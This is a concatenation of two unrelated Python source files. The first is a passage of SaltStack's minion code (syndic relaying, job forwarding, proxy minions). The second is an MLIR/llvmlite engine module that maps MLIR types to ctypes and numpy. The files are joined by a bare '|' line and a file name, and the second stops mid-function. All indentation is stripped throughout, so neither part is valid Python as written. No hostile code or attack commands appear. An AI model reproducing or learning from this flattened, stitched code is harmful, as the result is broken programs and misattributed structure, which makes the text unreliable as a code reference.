log.warning('Attempt to ping master failed.', exc_on_loglevel=logging.DEBUG)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000)
self.periodic_callbacks['ping'].start()
# add handler to subscriber
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(self._handle_payload)
elif self.opts.get('master_type') != 'disable':
log.error('No connection to master found. Scheduled jobs will not run.')
if start:
try:
self.io_loop.start()
if self.restart:
self.destroy()
except (KeyboardInterrupt, RuntimeError): # A RuntimeError can be re-raised by Tornado on shutdown
self.destroy()
def _handle_payload(self, payload):
if payload is not None and payload['enc'] == 'aes':
if self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
elif self.opts['zmq_filtering']:
# In the filtering enabled case, we'd like to know when minion sees something it shouldnt
log.trace(
'Broadcast message received not for this minion, Load: %s',
payload['load']
)
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the minion currently has no need.
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = self.matchers.get('{0}_match.match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
if self._running is False:
return
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to false in Sodium release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if not masters:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _metaproxy_call(opts, fn_name):
metaproxy = salt.loader.metaproxy(opts)
try:
metaproxy_name = opts['metaproxy']
except KeyError:
metaproxy_name = 'proxy'
log.trace(
'No metaproxy key found in opts for id %s. '
'Defaulting to standard proxy minion.',
opts['id']
)
metaproxy_fn = metaproxy_name + '.' + fn_name
return metaproxy[metaproxy_fn]
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
mp_call = _metaproxy_call(self.opts, 'post_master_init')
return mp_call(self, master)
def _target_load(self, load):
'''
Verify that the publication is valid and applies to this minion
'''
mp_call = _metaproxy_call(self.opts, 'target_load')
return mp_call(self, load)
def _handle_payload(self, payload):
mp_call = _metaproxy_call(self.opts, 'handle_payload')
return mp_call(self, payload)
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
mp_call = _metaproxy_call(self.opts, 'handle_decoded_payload')
return mp_call(self, data)
@classmethod
def _target(cls, minion_instance, opts, data, connected):
mp_call = _metaproxy_call(opts, 'target')
return mp_call(cls, minion_instance, opts, data, connected)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_return')
return mp_call(cls, minion_instance, opts, data)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_multi_return')
return mp_call(cls, minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
engine.py
|
import os
import sys
import shutil
import re
import subprocess
import itertools
import mlir
import ctypes
import glob
import operator
import tempfile
import uuid
import distutils.ccompiler
import multiprocessing as mp
import llvmlite.binding as llvm
import numpy as np
from .sparse_utils import MLIRSparseTensor
from functools import reduce, partial
from .cli import MlirOptCli, MlirOptError, DebugResult
from typing import (
Tuple,
List,
Iterable,
Set,
Dict,
Callable,
Union,
Any,
Optional,
)
# TODO we need O(1) access to the types of each dialect ; make this part of PyMLIR
_DIALECT_TYPES = {
dialect.name: {
dialect_type.__name__: dialect_type for dialect_type in dialect.types
}
for dialect in mlir.dialects.STANDARD_DIALECTS
}
_CURRENT_MODULE_DIR = os.path.dirname(__file__)
_SPARSE_UTILS_SO_FILE_PATTERN = os.path.join(_CURRENT_MODULE_DIR, "SparseUtils*.so")
_SPARSE_UTILS_SO_FILES = glob.glob(_SPARSE_UTILS_SO_FILE_PATTERN)
if len(_SPARSE_UTILS_SO_FILES) == 0:
# TODO this hard-codes the setup.py option and the location of setup.py
raise RuntimeError(
f"{_SPARSE_UTILS_SO_FILE_PATTERN} not found. This can typically be solved "
f'by running "python setup.py build_ext" from {os.path.dirname(_CURRENT_MODULE_DIR)}.'
)
elif len(_SPARSE_UTILS_SO_FILES) > 1:
raise RuntimeError(
f"Multiple files matching {_SPARSE_UTILS_SO_FILE_PATTERN} found."
)
[_SPARSE_UTILS_SO] = _SPARSE_UTILS_SO_FILES
llvm.load_library_permanently(
_SPARSE_UTILS_SO
) # TODO will this cause name collisions with other uses of llvmlite by third-party libraries?
llvm.initialize()
llvm.initialize_native_target()
llvm.initialize_native_asmprinter()
MLIR_FLOAT_ENUM_TO_NP_TYPE = {
mlir.astnodes.FloatTypeEnum.f16: np.float16,
mlir.astnodes.FloatTypeEnum.f32: np.float32,
mlir.astnodes.FloatTypeEnum.f64: np.float64,
# TODO handle mlir.astnodes.FloatTypeEnum.bf16
}
INTEGER_WIDTH_TO_NP_TYPE = { # TODO is there some nice accessor to get np.int* types from integers ?
1: np.bool_,
8: np.int8,
16: np.int16,
32: np.int32,
64: np.int64,
# TODO do we need np.longlong here?
}
NP_TYPE_TO_CTYPES_TYPE = {
np.dtype(ctype).type: ctype
for ctype in [ # from numpy.ctypeslib._get_scalar_type_map
ctypes.c_byte,
ctypes.c_short,
ctypes.c_int,
ctypes.c_long,
ctypes.c_longlong,
ctypes.c_ubyte,
ctypes.c_ushort,
ctypes.c_uint,
ctypes.c_ulong,
ctypes.c_ulonglong,
ctypes.c_float,
ctypes.c_double,
ctypes.c_bool,
]
}
def convert_mlir_atomic_type(
mlir_type: mlir.astnodes.Type, return_pointer_type: bool = False
) -> Tuple[type, type]:
"""
First return value is a subclass of np.generic .
Second return value is a subclass of _ctypes._CData .
"""
# TODO Add a custom hash/eq method for mlir.astnodes.Node so that we can put
# all the mlir.astnodes.*Type instances into a dict
# it'll obviate the need for this section of code.
np_type = None
if isinstance(mlir_type, mlir.astnodes.FloatType):
np_type = MLIR_FLOAT_ENUM_TO_NP_TYPE[mlir_type.type]
elif isinstance(mlir_type, mlir.astnodes.IntegerType):
np_type = INTEGER_WIDTH_TO_NP_TYPE[int(mlir_type.width)]
elif isinstance(mlir_type, mlir.astnodes.IndexType):
np_type = np.uint64
if np_type is None:
raise ValueError(f"Could not determine numpy type corresonding to {mlir_type}")
ctypes_type = (
np.ctypeslib.ndpointer(np_type)
if return_pointer_type
else NP_TYPE_TO_CTYPES_TYPE[np_type]
)
return np_type, ctypes_type
############################
# MLIR Return Type Helpers #
############################
def return_pretty_dialect_type_to_ctypes(
pretty_type: mlir.astnodes.PrettyDialectType,
) -> Tuple[type, Callable]:
# Pretty dialect types must be special-cased since they're arbitrarily structured.
raise NotImplementedError(f"Converting {pretty_type} to ctypes not yet supported.")
def return_tensor_to_ctypes(
tensor_type: mlir.astnodes.RankedTensorType,
) -> Tuple[type, Callable]:
if tensor_type.encoding is not None:
# We assume anything with an encoding must be a sparse tensor
# After lowering, this will become !llvm.ptr<i8>
CtypesType = ctypes.POINTER(ctypes.c_int8)
if isinstance(tensor_type.encoding, mlir.astnodes.SparseTensorEncoding):
pointer_type = f"uint{tensor_type.encoding.pointer_bit_width}"
index_type = f"uint{tensor_type.encoding.index_bit_width}"
else:
pointer_type = "uint64"
index_type = "uint64"
value_type = {
"i32": "int32",
"i64": "int64",
"f32": "float32",
"f64": "float64",
}[tensor_type.element_type.type.name]
def decoder(arg, ptype=pointer_type, itype=index_type, vtype=value_type) -> int:
ptr = ctypes.cast(arg, ctypes.c_void_p).value
return MLIRSparseTensor.from_raw_pointer(ptr, ptype, itype, vtype)
else:
np_type, ctypes_type = convert_mlir_atomic_type(tensor_type.element_type)
fields = [
("alloc", ctypes.POINTER(ctypes_type)),
("base", ctypes.POINTER(ctypes_type)),
("offset", ctypes.c_int64),
]
rank = len(tensor_type.dimensions)
for prefix in ("size", "stride"):
for i in range(rank):
field = (f"{prefix}{i}", ctypes.c_int64)
fields.append(field)
class CtypesType(ctypes.Structure):
_fields_ = fields
def decoder(result: CtypesType) -> np.ndarray:
if not isinstance(result, CtypesType):
raise TypeError(
f"Return value {result} expected to have type {CtypesType}."
)
dimensions = [
getattr(result, f"size{dim_index}") for dim_index in range(rank)
]
element_count = reduce(operator.mul, dimensions)
decoded_result = np.frombuffer(
(ctypes_type * element_count).from_address(
ctypes.addressof(result.base.contents)
),
dtype=np_type,
).reshape(dimensions)
return decoded_result
return CtypesType, decoder
def return_llvm_pointer_to_ctypes(
mlir_type: _DIALECT_TYPES["llvm"]["LLVMPtr"],
) -> Tuple[type, Callable]:
raise NotImplementedError(f"Converting {mlir_type} to ctypes not yet supported.")
def return_llvm_type_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[type, Callable]:
if isinstance(mlir_type, _DIALECT_TYPES["llvm"]["LLVMPtr"]):
result = return_llvm_pointer_to_ctypes(mlir_type)
elif isinstance(mlir_type, _DIALECT_TYPES["llvm"]["LLVMVec"]):
raise NotImplementedError(
f"Converting {mlir_type} to ctypes not yet supported."
)
else:
raise NotImplementedError(
f"Converting {mlir_type} to ctypes not yet supported."
)
return result
def return_scalar_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[type, Callable]:
np_type, ctypes_type = convert_mlir_atomic_type(mlir_type)
def decoder(result) -> np_type:
if not np.can_cast(result, np_type):
raise TypeError(
f"Return value {result} expected to be castable to {np_type}."
)
return np_type(result)
return ctypes_type, decoder
def return_type_to_ctypes(mlir_type: mlir.astnodes.Type) -> Tuple[type, Callable]:
"""Returns a single ctypes type for a single given MLIR type as well as a decoder."""
# TODO handle all other child classes of mlir.astnodes.Type
# TODO consider inlining this if it only has 2 cases
if isinstance(mlir_type, mlir.astnodes.PrettyDialectType):
result = return_pretty_dialect_type_to_ctypes(mlir_type)
elif isinstance(mlir_type, mlir.astnodes.RankedTensorType):
result = return_tensor_to_ctypes(mlir_type)
elif any(
isinstance(mlir_type, llvm_type)
for llvm_type in _DIALECT_TYPES["llvm"].values()
):
result = return_llvm_type_to_ctypes(mlir_type)
else:
result = return_scalar_to_ctypes(mlir_type)
return result
###########################
# MLIR Input Type Helpers #
###########################
LLVM_DIALECT_TYPE_STRING_TO_CTYPES_POINTER_TYPE: Dict[str, "_ctypes._CData"] = {
"i8": ctypes.POINTER(ctypes.c_int8),
# TODO extend this
}
def input_pretty_dialect_type_to_ctypes(
pretty_type: mlir.astnodes.PrettyDialectType,
) -> Tuple[list, Callable]:
# Special handling for !llvm.ptr<ptr<i8>>
if (
pretty_type.dialect == "llvm"
and pretty_type.type == "ptr"
and pretty_type.body[0].type == "ptr"
and pretty_type.body[0].body[0] == "i8"
):
# Convert to an LLVMPtr<LLVMPtr<i8>>
LLVMPtr = _DIALECT_TYPES["llvm"]["LLVMPtr"]
inner_obj = object.__new__(LLVMPtr)
inner_obj.type = mlir.astnodes.IntegerType(width=8)
outer_obj = object.__new__(LLVMPtr)
outer_obj.type = inner_obj
return input_llvm_pointer_to_ctypes(outer_obj)
# Pretty dialect types must be special-cased since they're arbitrarily structured.
raise NotImplementedError(f"Converting {pretty_type} to ctypes not yet supported.")
def input_tensor_to_ctypes(
tensor_type: mlir.astnodes.RankedTensorType,
) -> Tuple[list, Callable]:
if tensor_type.encoding is not None:
# We assume anything with an encoding must be a sparse tensor
# After lowering, this will become !llvm.ptr<i8>
ctypes_type = ctypes.POINTER(ctypes.c_int8)
input_c_types = [ctypes_type]
def encoder(arg: MLIRSparseTensor) -> List[ctypes_type]:
# protocol for indicating an object can be interpreted as a MLIRSparseTensor
if hasattr(arg, "__mlir_sparse__"):
arg = arg.__mlir_sparse__
if not isinstance(arg, MLIRSparseTensor):
raise TypeError(
f"{repr(arg)} is expected to be an instance of {MLIRSparseTensor.__qualname__}"
)
return [ctypes.cast(arg.data, ctypes_type)]
else:
input_c_types = []
np_type, pointer_type = convert_mlir_atomic_type(
tensor_type.element_type, return_pointer_type=True
)
input_c_types.append(pointer_type) # allocated pointer (for free())
input_c_types.append(pointer_type) # base pointer
input_c_types.append(ctypes.c_int64) # offset from base
for _ in range(2 * len(tensor_type.dimensions)): # dim sizes and strides
input_c_types.append(ctypes.c_int64)
dimensions = [dim.value for dim in tensor_type.dimensions]
def encoder(arg: np.ndarray) -> list:
if not isinstance(arg, np.ndarray):
raise TypeError(
f"{repr(arg)} is expected to be an instance of {np.ndarray.__qualname__}"
)
if not arg.dtype == np_type:
raise TypeError(f"{repr(arg)} is expected to have dtype {np_type}")
if not len(dimensions) == len(arg.shape):
raise ValueError(
f"{repr(arg)} is expected to have rank {len(dimensions)} but has rank {len(arg.shape)}."
)
encoded_args = [arg, arg, 0]
for dim_index, dim_size in enumerate(arg.shape):
expected_dim_size = dimensions[dim_index]
if (
expected_dim_size is not None
and arg.shape[dim_index] != expected_dim_size
):
raise ValueError(
f"{repr(arg)} is expected to have size {expected_dim_size} in the "
f"{dim_index}th dimension but has size {arg.shape[dim_index]}."
)
encoded_args.append(arg.shape[dim_index])
for dimension_index in range(len(arg.shape)):
stride = arg.strides[dimension_index] // arg.itemsize
encoded_args.append(stride)
return encoded_args
return input_c_types, encoder
def input_llvm_pointer_to_ctypes(
mlir_type: _DIALECT_TYPES["llvm"]["LLVMPtr"],
) -> Tuple[list, Callable]:
if (
isinstance(mlir_type.type, mlir.astnodes.IntegerType)
and int(mlir_type.type.width) == 8
):
# We blindly assume that an i8 pointer points to a sparse tensor
# since MLIR's sparse tensor object isn't supported inside an LLVMPtr
# Instead, we pass a ptr<ptr<i8>> and blindly assume it means a list of sparse tensors
type_string = mlir_type.type.dump()
ctypes_type = LLVM_DIALECT_TYPE_STRING_TO_CTYPES_POINTER_TYPE[type_string]
ctypes_input_types = [ctypes_type]
def encoder(arg: MLIRSparseTensor) -> list:
# protocol for indicating an object can be interpreted as a MLIRSparseTensor
if hasattr(arg, "__mlir_sparse__"):
arg = arg.__mlir_sparse__
if not isinstance(arg, MLIRSparseTensor):
raise TypeError(
f"{repr(arg)} is expected to be an instance of {MLIRSparseTensor.__qualname__}"
)
return [ctypes.cast(arg.data, ctypes_type)]
else:
# Treat the pointer as an array (intended to represent a Python sequence).
element_ctypes_input_types, element_encoder = input_type_to_ctypes(
mlir_type.type
)
# element_ctypes_input_types has exactly one element type since
# a pointer type can only point to one type
